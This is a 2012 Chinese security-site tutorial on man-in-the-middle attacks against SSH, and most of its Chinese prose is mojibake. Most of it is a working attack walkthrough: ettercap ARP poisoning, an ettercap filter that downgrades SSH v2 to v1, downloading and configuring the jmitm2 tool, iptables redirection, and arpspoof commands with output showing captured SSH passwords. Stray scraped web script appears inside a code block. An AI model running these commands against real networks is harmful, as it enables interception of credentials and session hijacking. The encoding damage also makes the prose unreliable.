ƵµÀÀ¸Ä¿
Ê×Ò³ > °²È« > ÍøÂ簲ȫ > ÕýÎÄ

SSH V2µÄÖмäÈ˹¥»÷

2012-12-19 10:48:52      ¸öÆÀÂÛ       ×÷ÕߣºDis9Team
Êղؠ  ÎÒҪͶ¸å
ÖмäÈ˹¥»÷£¨Man-in-the-MiddleAttack£¬¼ò³Æ“MITM¹¥»÷”£©ÖмäÈ˹¥»÷ºÜÔç¾Í³ÉΪÁ˺ڿͳ£ÓõÄÒ»ÖÖ¹ÅÀϵĹ¥»÷ÊֶΣ¬²¢ÇÒÒ»Ö±µ½½ñÌ컹¾ßÓм«´óµÄÀ©Õ¹¿Õ¼ä¡£

ÔÚÍøÂ簲ȫ·½Ã棬MITM¹¥»÷µÄʹÓÃÊǺܹ㷺µÄ£¬Ôø¾­²þâ±Ò»Ê±µÄSMB»á»°½Ù³Ö¡¢DNSÆÛÆ­µÈ¼¼Êõ¶¼ÊǵäÐ͵ÄMITM¹¥»÷ÊֶΡ£Ôںڿͼ¼ÊõÔ½À´Ô½¶àµÄÔËÓÃÓÚÒÔ»ñÈ¡¾­¼ÃÀûÒæÎªÄ¿±êµÄÇé¿öÏÂʱ£¬MITM¹¥»÷³ÉΪ¶ÔÍøÒø¡¢ÍøÓΡ¢ÍøÉϽ»Ò×µÈ×îÓÐÍþв²¢ÇÒ×î¾ßÆÆ»µÐÔµÄÒ»ÖÖ¹¥»÷·½Ê½¡£
Òª·À·¶MITM¹¥»÷£¬¿ÉÒÔ½«Ò»Ð©»úÃÜÐÅÏ¢½øÐмÓÃܺóÔÙ´«Ê䣬ÕâÑù¼´Ê¹±»“ÖмäÈË”½ØÈ¡Ò²ÄÑÒÔÆÆ½â£¬ÁíÍ⣬ÓÐһЩÈÏÖ¤·½Ê½¿ÉÒÔ¼ì²âµ½MITM¹¥»÷¡£

ÖÁÓÚ¾ÖÓòÍøÄÚ¸÷ÖÖ¸÷ÑùµÄ»á»°½Ù³Ö£¨¾ÖÓòÍøÄڵĴúÀí³ýÍ⣩£¬ÒòΪËüÃǶ¼Òª½áºÏÐá̽ÒÔ¼°ÆÛÆ­¼¼ÊõÔÚÄڵĹ¥»÷ÊֶΣ¬±ØÐëÒÀ¿¿ARPºÍMAC×ö»ù´¡£¬ËùÒÔÍø¹ÜÓ¦¸ÃʹÓý»»»Ê½ÍøÂ磨ͨ¹ý½»»»»ú´«Ê䣩´úÌæ¹²ÏíÊ½ÍøÂ磨ͨ¹ý¼¯Ï߯÷´«Ê䣩£¬Õâ¿ÉÒÔ½µµÍ±»ÇÔÌýµÄ»úÂÊ£¬µ±È»ÕâÑù²¢²»Äܸù³ý»á»°½Ù³Ö£¬»¹±ØÐëʹÓþ²Ì¬ARP¡¢À¦°óMAC+IPµÈ·½·¨À´ÏÞÖÆÆÛÆ­£¬ÒÔ¼°²ÉÓÃÈÏÖ¤·½Ê½µÄÁ¬½ÓµÈ¡£

µ«ÊǶÔÓÚ“´úÀíÖмäÈ˹¥»÷”¶øÑÔ£¬ÒÔÉÏ·½·¨¾ÍÄÑÒÔ¼ûЧÁË£¬ÒòΪ´úÀí·þÎñÆ÷±¾À´¾ÍÊÇÒ»¸ö“ÖмäÈË”½ÇÉ«£¬¹¥»÷Õß²»ÐèÒª½øÐÐÈÎºÎÆÛÆ­¾ÍÄÜÈÃÊܺ¦Õß×Ô¼ºÁ¬½ÓÉÏÀ´£¬¶øÇÒ´úÀíÒ²²»Éæ¼°MACµÈÒòËØ£¬ËùÒÔÒ»°ãµÄ·À·¶´ëÊ©¶¼²»Æð×÷Óá£

³ý·ÇÄãÊÇÒª¸É»µÊ£¬»òÕßIP±»ÆÁ±Î£¬»òÕßÌìÉú¶ÔÍøÂçÓÐ×ſ־壬·ñÔò»¹ÊDz»ÒªÕûÌìÕÒÒ»¶Ñ´úÀíÀ´Òþ²Ø×Ô¼ºÁË£¬Ã»±ØÒªµÄ¡£³£ÔÚºÓ±ß×ߣ¬¼´Ê¹ÓöÉÏ×öÁËÊֽŵĴúÀíÒ²ÄѲì¾õ¡£

 

Openssh

OpenSSH ÊÇ SSH £¨Secure SHell£© ЭÒéµÄÃâ·Ñ¿ªÔ´ÊµÏÖ¡£SSHЭÒé×å¿ÉÒÔÓÃÀ´½øÐÐÔ¶³Ì¿ØÖÆ£¬ »òÔÚ¼ÆËã»úÖ®¼ä´«ËÍÎļþ¡£¶øÊµÏִ˹¦ÄܵĴ«Í³·½Ê½£¬Èçtelnet(ÖÕ¶Ë·ÂÕæÐ­Òé)¡¢ rcp ftp¡¢ rlogin¡¢rsh¶¼ÊǼ«Îª²»°²È«µÄ£¬²¢ÇÒ»áʹÓÃÃ÷ÎÄ´«ËÍÃÜÂë¡£OpenSSHÌṩÁË·þÎñ¶Ëºǫ́³ÌÐòºÍ¿Í»§¶Ë¹¤¾ß£¬ÓÃÀ´¼ÓÃÜÔ¶³Ì¿Ø¼þºÍÎļþ´«Êä¹ý³ÌµÄÖеÄÊý¾Ý£¬²¢ÓÉ´ËÀ´´úÌæÔ­À´µÄÀàËÆ·þÎñ¡£
OpenSSHÊÇʹÓÃSSH͸¹ý¼ÆËã»úÍøÂç¼ÓÃÜͨѶµÄʵÏÖ¡£ËüÊÇÈ¡´úÓÉSSH Communications SecurityËùÌṩµÄÉÌÓð汾µÄ¿ª·ÅÔ´´úÂë·½°¸¡£Ä¿Ç°OpenSSHÊÇOpenBSDµÄ×Ӽƻ®¡£
OpenSSH³£³£±»ÎóÈÏÒÔΪÓëOpenSSLÓйØÁª£¬µ«Êµ¼ÊÉÏÕâÁ½¸ö¼Æ»®µÄÓв»Í¬µÄÄ¿µÄ£¬²»Í¬µÄ·¢Õ¹ÍŶӣ¬Ãû³ÆÏà½üÖ»ÊÇÒòΪÁ½ÕßÓÐͬÑùµÄÈí¼þ·¢Õ¹Ä¿±ê©¤©¤Ìṩ¿ª·ÅÔ´´úÂëµÄ¼ÓÃÜͨѶÈí¼þ¡£
OpenSSH Ö§³Ö SSH ЭÒéµÄ°æ±¾ 1.3¡¢1.5¡¢ºÍ 2¡£×Ô´Ó OpenSSH µÄ°æ±¾2.9ÒÔÀ´£¬Ä¬ÈϵÄЭÒéÊǰ汾2£¬¸ÃЭÒéĬÈÏʹÓà RSA Ô¿³×¡£de:OpenSSH en:OpenSSH es:OpenSSH fr:OpenSSH it:OpenSSH ja:OpenSSH lv:OpenSSH nl:OpenSSH pl:OpenSSH sv:OpenSSH

µÍ°æ±¾µÄ¹¥»÷

ÀýÈçÕâ¸ö·þÎñÆ÷µÄSSH°æ±¾
SSH V2µÄÖмäÈ˹¥»÷vcmc=" width="723" />
°æ±¾ºÜµÍSSH-1.5-OpenSSH_6.0p1 ¿ÉÒÔÖ±½ÓARP²»£¿
Æô¶¯ETTERCAP ½øÐÐARP

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

root@Dis9Team:~# ettercap -T -M arp // // -q -i eth5

 

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

 

Listening on eth5... (Ethernet)

 

  eth5 ->    08:00:00:00:00:03           5.5.5.3     255.255.255.0

 

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Privileges dropped to UID 0 GID 0...

 

  28 plugins

  39 protocol dissectors

  53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

 

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

 

2 hosts added to the hosts list...

 

ARP poisoning victims:

 

 GROUP 1 : ANY (all the hosts in the list)

 

 GROUP 2 : ANY (all the hosts in the list)

Starting Unified sniffing...

 

Text only Interface activated...

Hit 'h' for inline help

怬SSH

1

2

3

4

5

6

7

<pre>brk $ ssh 5.5.5.6 -p 2222 -1

brk@5.5.5.6<SCRIPT type=text/javascript>

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</SCRIPT>'s password:

Last login: Sat Nov 17 19:30:29 2012 from 5.5.5.1

³É¹¦ARPµ½ÃÜÂë
SSH V2µÄÖмäÈ˹¥»÷

Sshmitm

Sshmitm ÊÇDsniff×Ô´øµÄÒ»¸ö¾ßÓÐÍþвµÄ¹¤¾ßÖ®Ò»¡£Èç¹ûÄãÊÇÔÚÔËÐÐdnsspoofÀ´Î±Ôìʵ¼Ê»úÆ÷Ö÷»úÃû£¬ÄÇôsshmitm¿ÉÒÔÖØÐ¶¨Ïòµ½ÄãµÄ»úÆ÷µÄsshÁ÷Á¿¡£ÒòΪËüÖ§³Öµ½ss1£¬ËùÒÔÕâÒ²ÊÇÎÒÃÇÐèÒª¿¼ÂǰÑsshÉý¼¶µ½2µÄÔ­Òò¡£
SshmitmµÄ¹¤×÷Ô­ÀíÖ÷ÒªÊÇdnsspoof¹¤¾ßʹÎÒÃÇÀ¹½Øµ½´ïÁíһ̨»úÆ÷µÄsshÁ¬½Ó¡£Ö»ÐèÒªÔÚ¶Ë¿Ú22ÉÏÆô¶¯Sshmitm(ÕâÀïÎÒÃÇ¿ÉÒÔʹÓÃ-pÑ¡ÏîÀ´¸Ä±äËùʹÓõĶ˿ںÅ)£¬²¢ÉèÖÃËüÀ´ÖÐ¼Ì´ïµ½ÕæÊµÖ÷»úµÄÁ¬½Ó¡£
sshmitm¿ÉÒÔ¶Ôij¸öSSH»á»°·¢¶¯MITM£¨Monkey-In-The-Middle£©¹¥»÷£¨×¢Ò⣬ÕâÀïµÄMonkeyÊÇDsniff°üreadmeÎļþÖеĽâÎö£¬¶ø²»Êdz£¼ûµÄMan£¬ÕâÖÖÇø±ðʵ¼ÊÉÏÊÇûÓÐ“Çø±ð”£¬Ò²Ðí¾ÍÊÇÒòΪDsniffÒÔºï×Ó×öΪÆä±êÖ¾µÄÔ­Òò°É£©¡£
ͨ¹ýsshmitm£¬¹¥»÷Õß¿ÉÒÔ²¶»ñij¸öSSH»á»°µÄµÇ¼¿ÚÁÉõÖÁ¿ÉÒÔ“½Ù³Ö”Õû¸ö»á»°¹ý³Ì£¨¹¥»÷ÕßÔÚÆäÖ÷»úÉÏͨ¹ýOpenSSLÌṩµÄ´úÂëÉú³ÉαÔìµÄÖ¤Ê飬ÒÔÆÛÆ­Ä¿±êÖ÷»ú£¬Ê¹Ö®ÏàОÍÊÇÓÐЧµÄͨÐÅÁíÒ»·½£¬½á¹ûÊÇ£¬¹¥»÷ÕßÖ÷»ú³ÉÁËSSH°²È«Í¨µÀµÄÖÐתվ£©¡£
Ŀǰ£¬¶ÔÓÚSSH1£¬ÕâÖÖMITM¹¥»÷ÒѾ­¹¹³ÉÁËÑÏÖØµÄÍþв¡£
MITM²¢²»ÊÇÒ»¸öеĸÅÄËüÊÇÒ»ÖÖ¶ÔÈÏÖ¤¼°ÃÜÔ¿½»»»Ð­Òé½øÐй¥»÷µÄÓÐЧÊֶΡ£Í¨³££¬ÔÚSSH»á»°ÖУ¬·þÎñÆ÷Ê×ÏÈ»á¸ø¿Í»§¶Ë·¢ËÍÆä¹«Ô¿£¬ÑϸñÀ´Ëµ£¬ÕâÖÖÃÜÔ¿µÄ½»»»ºÍ¹ÜÀíÓ¦¸ÃÊÇ»ùÓÚX.509ÕâÖÖ¹«Ô¿»ù´¡ÉèÊ©£¨PKI£©µÄ£¬µ«ÒòΪPKI±¾ÉíµÄ¸´ÔÓÐÔµ¼ÖÂÕæÕýÓ¦ÓÃÁËÕâÖÖ¹«Ô¿¹ÜÀí»úÖÆµÄ·þÎñÆ÷·Ç³£ÉÙ£¬ËùÒÔ£¬Í¨³£Çé¿öÏ£¬·þÎñÆ÷Ö»ÊǼòµ¥µÄ×Ô¼ºÉú³ÉÃÜÔ¿¶Ô£¬²¢½«ÆäÖеĹ«Ô¿·¢Ë͸ø¿Í»§¶Ë¡£
¿Í»§¶ËÊÕµ½·þÎñÆ÷µÄ¹«Ô¿ºó£¬±ØÐë¶ÀÁ¢ÑéÖ¤ÆäÓÐЧÐÔ¡£Í¨³££¬Ê¹ÓÃSSHµÄ¿Í»§¶Ë»áÓÉsysadmin»òÆäËüÕ˺ÅÀ´Î¬»¤Ò»¸ö“ÃÜÔ¿/Ö÷»úÃû”µÄ±¾µØÊý¾Ý¿â£¬µ±Ê×´ÎÓëij¸öSSH·þÎñÆ÷½¨Á¢Á¬½Óʱ£¬¿Í»§¶Ë¿ÉÄܱ»ÊÂÏÈÅäÖÆ³É×Ô¶¯½ÓÊܲ¢¼Ç¼·þÎñÆ÷¹«Ô¿µ½±¾µØÊý¾Ý¿âÖУ¬Õâ¾Íµ¼Ö¿ÉÄÜ·¢ÉúMITM¹¥»÷¡£Æäʵ£¬½¨Á¢¼ÓÃܵİ²È«ÍøÂç¶¼´æÔÚÒ»¸ö»ù±¾µÄÎÊÌ⣬ÎÞÂÛÈçºÎ£¬Ä³Ö̶ֳÈÉϽ²£¬¼ÓÃÜͨµÀµÄ³õʼ»¯Á¬½Ó×ÜÊǽ¨Á¢ÔÚÒ»¸ö´æÔÚDZÔÚΣÏÕµÄÍøÂçÖ®Éϵģ¬Èç¹ûÃÜÔ¿½»»»»úÖÆ²¢²»½¡È«£¬»òÕßÊǸù±¾¾Í±»ºöÂÔÁË£¬ÄÇÖ®ºó½¨Á¢ÆðÀ´µÄ¼ÓÃÜͨµÀÒ²ÐÎͬÐéÉèÁË¡£°´µÀÀí½²£¬SSHÖ®ÀàµÄЭÒé±¾ÉíÊÇûÓÐÎÊÌâµÄ£¬Ö»ÒªÑϸñ°´ÕÕ±ê×¼À´½¨Á¢¼ÓÃܼ°ÃÜÔ¿½»»»¹ÜÀí»úÖÆ£¨ÀýÈçPKI£©£¬¹¥»÷ÕßÊǸù±¾²»»áÓпɳËÖ®»úµÄ£¬¿ÉÎÊÌâ¾ÍÔÚÓÚ£¬Ðí¶àʱºò£¬ÎªÁËʹÓÃÉϵķ½±ã£¬“¸´ÔÓ”µÄ±£Ö¤¼¼Êõ¾Í±»ÈËÃÇÅ×Ö®ÄÔºóÁË¡£
µ±È»£¬Ò»ÖÖЭÒéÈç¹ûÆä¿ÉÓÃÐÔ²¢²»ºÜÇ¿£¬Ò²Ðí±¾Éí¾ÍÊÇÎÊÌ⣬ÏÖÔÚ£¬SSH2½ÏSSH1ÒѾ­ÓÐÁ˽ϴó¸Ä½ø¡£¾ßÌåÀ´Ëµ£¬ÔÚij¸öSSHÁ¬½Ó½¨Á¢Ö®³õ£¬Èç¹û¿Í»§¶ËÊÕµ½Ò»¸öδ֪µÄ·þÎñÆ÷¶Ë¹«Ô¿£¬OpenSSH»áÓÐÏÂÁÐÅäÖô¦Àí·½Ê½£º

  • ×Ô¶¯Ôö¼Ó¸Ã¹«Ô¿µ½±¾µØÊý¾Ý¿â£»
  • ·¢³öÏÂÃæÁгöµÄ¾¯¸æÏûÏ¢£¬²¢Ñ¯ÎÊÓû§ÊÇÌí¼Ó¸Ã¹«Ô¿»¹ÊÇ·ÅÆúÁ¬½Ó£»
    ————————————————————————
    – WARNING: HOST IDENTIFICATION HAS CHANGED! –
    ————————————————————————
    IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
    Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the host-key has just been changed. Please contact your system administrator.
  • ¾Ü¾ø½ÓÊÜ¡£Èç¹û¿Í»§¶Ë¶Ôδ֪¹«Ô¿µÄÑéÖ¤±»È¡ÏûÁË£¨»òÕ߿ͻ§¶ËÅäÖñ¾ÉíÒѾ­ÅÔ·µôÁËÕâ¸ö¹ý³Ì£©£¬»òÕßÈç¹û¿Í»§¶Ë±£´æÒÑÖªÖ÷»úCAÖ¤ÊéµÄ»º´æ±»“¶¾º¦”ÁË£¬¾ÍºÜÓпÉÄܵ¼Ö¹¥»÷Õß·¢ÆðMITM¹¥»÷¡£´Ó¸ù±¾ÉϽ²£¬Òª·ÀÖ¹MITM·½Ê½µÄ¹¥»÷£¬Óû§×ÔÉí¼ÓÇ¿°²È«´ëÊ©²ÅÊǹؼü£¬ÀýÈ磬ÃÜÔ¿µÄ³õʼ½»»»Ò²Ðí¿ÉÒÔ»»×öÆäËü·½Ê½£¨±ÈÈçÈíÅÌ£©£¬Ñϸñ¹ÜÀí±¾µØµÄÖ¤ÊéÁбíÊý¾Ý¿â£¬¶ÔÓÚ³öÏֵĸ澯Ìáʾ£¬Ó¦¸Ã×ÐϸÕç±ð£¬·ÀÖ¹µÚÈý·½µÄÆÛÆ­ÐÐΪ¡£

½µ¼¶MITM¹¥»÷

½µ¼¶MITM¹¥»÷ÔÊÐí¹¥»÷Õ߯Èʹ¿Í»§¶ËºÍ/»ò·þÎñÆ÷ʹÓò»Ì«°²È«µÄЭÒé»ò¹¦Äܼ¯ºÏ£¬ÕâЩЭÒé»òÕß¹¦ÄÜÊÇΪÁËÏòϼæÈݾɰ汾µÄ¿Í»§¶Ë/·þÎñÆ÷²ÅÌṩµÄ¡£ÓÐʱ£¬¿Í»§¶ËÖ§³Ö·ÃÎʰüº¬²»Í¬ÌØÕ÷»òÍ¬Ò»ÌØÕ÷²»Í¬°æ±¾µÄ·þÎñÆ÷¡£ÕâÑù£¬¿Í»§¶ËºÍ·þÎñÆ÷Òª¾­³£Ð­ÉÌÓ¦¸ÃʹÓúÎÖÖÌØÕ÷ºÍºÎÖÖ°æ±¾µÄÌØÕ÷¡£ÀýÈ磬Ðí¶àSecure Shell£¨SSH£©¿Í»§¶Ëͬʱ֧³ÖSSHЭÒéµÄ v1°æ±¾ºÍv2°æ±¾£¬ÒÔ¼°¼¸ÖÖ²»Í¬µÄ¼ÓÃÜÃÜÂë¡££¨SSHÊÇÒ»ÖÖ¼ÓÃܵÄÍøÂçЭÒ飬ÓÃÓÚÁ¬½ÓÌṩÃüÁîÐзÃÎÊ·½Ê½µÄ¼ÆËã»ú¡££©v1°æ±¾º¬ÓÐЭÒéȱÏÝ£¬ÔÊÐí¹¥»÷Õß¿´µ½¿Í»§¶ËÓë·þÎñÆ÷½»»»µÄÕý³£¼ÓÃÜÊý¾Ý¡£
³öÓÚÕâ¸öÔ­Òò£¬´ó¶àÊýÈËʹÓÃSSH v2°æ¡£
È»¶ø£¬ÓÉÓÚÏòϼæÈݵÄÔ­Òò£¬Ðí¶à·þÎñÆ÷ºÍ¿Í»§¶ËÒÀȻ֧³ÖSSH v1°æ¡£ÀûÓÃMITM¹¥»÷£¬¹¥»÷Õß¿ÉÒÔ¸æÖª·þÎñÆ÷ºÍ¿Í»§¶ËÔÚ¿ªÊ¼¼ÓÃÜǰʹÓÃÒ×Êܹ¥»÷µÄSSH v1ЭÒ顣ΪÁË×èÖ¹´ËÀ๥»÷£¬´ó¶àÊýSSH¿Í»§¶ËºÍ·þÎñÆ÷Ö»Äܹ»ÉèÖóÉʹÓÃSSH v2ЭÒé¡£Ò»ÖÖ²âÊÔ¿Í»§¶ËÊÇ·ñÖ§³Ö´Ë¹æÔòµÄ¼òµ¥·½·¨£¬ÊÇ´úÀíÍøÂçÁ÷Á¿²¢¸æÖª¿Í»§¶ËʹÓþɰ汾µÄЭÒé¡£
ETTERCAPµÄARP¹æÔòÀïÃæÓÐ

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

<pre>root@Dis9Team:/usr/share/ettercap# cat etter.filter.ssh

############################################################################

#                                                                          #

#  ettercap -- etter.filter -- filter source file                          #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

############################################################################

 

##

#

#   This filter will substitute the SSH server response from SSH-1.99 to

#   SSH-1.51, so if the server supports both ssh1 and ssh2 we will force

#   it to use ssh1... <IMG class=wp-smiley alt=;) src=http://up.2cto.com/2012/1219/20121219105154693.gif" height=auto jQuery172042555347942556737="28" old_width="24" old_height="24"> 

#   server response :    SSH-2.00   only ssh2 supported

#                        SSH-1.99   both ssh1 and ssh2 supported

#                        SSH-1.51   only ssh1 supported

##

 

if (ip.proto == TCP) {

   if (tcp.src == 22) {

      if ( replace("SSH-1.99", "SSH-1.51") ) {

         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");

      } else {

         if ( search(DATA.data, "SSH-2.00") ) {

            msg("[SSH Filter] Server supports only SSH version 2\n");

         } else {

            if ( search(DATA.data, "SSH-1.51") ) {

               msg("[SSH Filter] Server already supports only version 1\n");

            }

         }

      }

   }

}

 

root@Dis9Team:/usr/share/ettercap#

SSH 1.9ÊDz»Äܱ»ARPµÄ£¬Ö»ÓÐSSH-1.5£¬Èç¹ûÄÜÖ§³Ö1.9 ºÍ 1.5£¬ÄÇô°É1.9Ìæ»»Îª1.5°æ±¾½øÐÐARP

2.0°æ±¾µÄ¹¥»÷

Èç¹ûÊÇ2.0ÄØ£¿

1

2

3

4

<pre>brk $ nc -vv 5.5.5.6 22

Connection to 5.5.5.6 22 port [tcp/ssh] succeeded!

SSH-2.0-OpenSSH_4.6

¿ÉÒÔÓÃjmitm½øÐÐARP¹¥»÷

1

2

3

4

5

<pre>root@Dis9Team:/pen# wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz

root@Dis9Team:/pen# tar xf jmitm2-0.1.0.tar.gz

root@Dis9Team:/pen# cd jmitm2-0.1.0/

root@Dis9Team:/pen/jmitm2-0.1.0#

ÐèÒª±à¼­Á½¸öÎļþ

1

2

<pre>root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/conf/server.xml

SSH V2µÄÖмäÈ˹¥»÷
ºÍÄ¿±êÖ÷»ú

root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/runm.sh

·¢ËÍÊý¾Ý°üÆÛÆ­Íø¹Ø ²¢ÇÒת·¢¶Ë¿Ú

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

<pre>root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT

root@Dis9Team:~# iptables -A FORWARD -j ACCEPT

root@Dis9Team:~# arpspoof -i eth5 -t 5.5.5.6 5.5.5.0

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

µ±¶Ô·½Á´½ÓSSHµÄʱºò ³É¹¦»ñµÃÃÜÂë
SSH V2µÄÖмäÈ˹¥»÷
¿ÉÒÔ»á³öÏÖSSHÃܳײ»¶Ô Èç¹ûÄ¿±êÒѾ­Á´½Ó¹ý

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!

Someone could be eavesdropping on you right now (man-in-the-middle attack)!

It is also possible that a host key has just been changed.

The fingerprint for the DSA key sent by the remote host is

dc:77:1e:b0:1b:a1:7c:71:33:1f:75:32:fe:e5:2e:28.

Please contact your system administrator.

Add correct host key in /home/brk/.ssh/known_hosts to get rid of this message.

Offending DSA key in /home/brk/.ssh/known_hosts:57

remove with: ssh-keygen -f "/home/brk/.ssh/known_hosts" -R 5.5.5.6

DSA host key for 5.5.5.6 has changed and you have requested strict checking.

Host key verification failed.

brk $

²»¹ýÕâ¶«Î÷µÄ¾ÖÏÞÐÔÌ«´ó£¡

²Î¿¼

http://www.david-guembel.de/index.php?id=6

Ç¿´óµÄÐá̽¹¤¾ßettercapʹÓý̳̣ºÎÒµÄÆÛÆ­¹æÔò

Ïà¹ØTAG±êÇ© ÖмäÈË
ÉÏһƪ£ºÎ±ÔìAP»ñÈ¡WiFiÃÜÂë
ÏÂһƪ£ºhttp·þÎñÆ÷µÄĿ¼°²È«ÐÔÅäÖÃ
Ïà¹ØÎÄÕÂ
ͼÎÄÍÆ¼ö

¹ØÓÚÎÒÃÇ | ÁªÏµÎÒÃÇ | ¹ã¸æ·þÎñ | Ͷ×ʺÏ×÷ | °æÈ¨ÉêÃ÷ | ÔÚÏß°ïÖú | ÍøÕ¾µØÍ¼ | ×÷Æ··¢²¼ | Vip¼¼ÊõÅàѵ | ¾Ù±¨ÖÐÐÄ

°æÈ¨ËùÓÐ: ºìºÚÁªÃË--ÖÂÁ¦ÓÚ×öʵÓõÄIT¼¼ÊõÑ§Ï°ÍøÕ¾